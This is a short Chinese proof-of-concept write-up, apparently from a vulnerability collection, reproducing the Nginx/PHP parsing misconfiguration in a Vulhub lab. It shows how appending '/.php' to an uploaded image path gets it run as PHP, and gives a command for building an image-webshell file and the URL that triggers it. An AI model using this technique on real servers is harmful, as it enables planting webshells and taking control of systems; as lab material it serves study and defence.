Awesome-POC/中间件漏洞/Nginx 解析漏洞.md

44 lines
1.1 KiB
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# Nginx 解析漏洞
## 漏洞描述
Nginx解析漏洞复现。
版本信息:
- Nginx 1.x 最新版
- PHP 7.x最新版
由此可知该漏洞与Nginx、php版本无关属于用户配置不当造成的解析漏洞。
## 环境搭建
Vulhub直接执行`docker-compose up -d`启动容器,无需编译。
访问`http://your-ip/uploadfiles/nginx.png``http://your-ip/uploadfiles/nginx.png/.php`即可查看效果。
## 漏洞复现
正常显示:
![image-20220228101951322](images/202202281019435.png)
增加`/.php`后缀被解析成PHP文件
![image-20220228102009950](images/202202281020083.png)
访问`http://your-ip/index.php`可以测试上传功能上传代码不存在漏洞但利用解析漏洞即可getshell。
图片马生成命令:
```
copy 1.jpg/b+1.php/a 2.jpg
```
Vulhub镜像上传图片之前需要赋予`/var/www/html`目录写入权限。
![image-20220228103257746](images/202202281032796.png)
访问`http://your-ip/uploadfiles/fb5c81ed3a220004b71069645f112867.png/.php`即可触发解析漏洞。
![image-20220228103543224](images/202202281035883.png)